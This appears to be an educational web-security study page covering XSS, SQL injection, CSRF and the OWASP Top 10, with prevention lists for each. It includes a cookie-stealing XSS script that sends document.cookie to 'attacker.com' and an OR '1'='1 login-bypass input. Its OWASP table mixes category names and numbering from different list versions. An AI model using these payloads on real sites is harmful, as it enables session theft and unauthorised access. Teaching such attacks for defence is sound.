Home / Topics / Web Security

Web Security

Master XSS, SQL injection, CSRF, and OWASP Top Ten vulnerabilities.

Introduction

Web Security focuses on protecting web applications from attacks. Web applications are often the target of attacks because they are accessible to anyone on the internet.

Key Principle: Security of web applications crucially depends on sanitization of user input. Never trust user input!

Cross-Site Scripting (XSS)

XSS occurs when web applications return user input without filtering, allowing execution of arbitrary JavaScript in the victim's browser.

Types of XSS

  • Reflected XSS: Malicious script in URL parameters
  • Stored XSS: Malicious script saved in database
  • DOM-based XSS: Client-side code manipulation

Example Attack

<script>document.location='attacker.com?c='+document.cookie</script>

This steals session cookies!

Real-World Impact

  • Cookie theft and session hijacking
  • Keylogging
  • Phishing
  • Defacement
  • The Samy Worm infected 1 million MySpace profiles using XSS

Prevention

  • Encode all user output
  • Use Content Security Policy (CSP)
  • Validate input with allowlists
  • Use HTTPOnly cookies

SQL Injection

SQL Injection exploits unsanitized user input in database queries, allowing attackers to interfere with database operations.

Example Attack

// Vulnerable query
SELECT * FROM users WHERE username = '" + username + "'

// Attacker enters: admin' OR '1'='1
// Result: SELECT * FROM users WHERE username = 'admin' OR '1'='1'
// Bypasses authentication!

Types of SQL Injection

  • In-band: Direct response from attack
  • Blind: Inferred from application behavior
  • Out-of-band: Using different channels

Prevention

  • Use Prepared Statements (Parameterized Queries)
  • Input validation
  • Least privilege database accounts
  • Web Application Firewalls (WAF)

Exam Tip: The primary defense against SQL injection is using prepared statements with parameterized queries!

Cross-Site Request Forgery (CSRF)

CSRF exploits existing session cookies when a user visits a malicious site, triggering unauthorized actions.

How It Works

  1. User logs into banking site
  2. Session cookie is stored
  3. User visits malicious site
  4. Malicious site sends request to bank
  5. Browser includes session cookie
  6. Unauthorized action is performed

Prevention

  • Anti-CSRF tokens
  • Check Referer header
  • Use SameSite cookies
  • Require re-authentication for sensitive actions

OWASP Top 10

The OWASP Top 10 lists the most critical web application security risks:

Rank Vulnerability Description
1 A01: Injection SQL, NoSQL, OS, LDAP injection
2 A02: Broken Auth Compromised passwords, sessions
3 A03: Sensitive Data Unprotected sensitive data
4 A04: XXE XML external entity attacks
5 A05: Broken Access Authorization bypass
6 A06: Security Misconfig Improper configurations
7 A07: XSS Cross-site scripting
8 A08: Insecure Deserial Deserialization flaws
9 A09: Using Components Vulnerable components
10 A10: Insufficient Logging Lack of security monitoring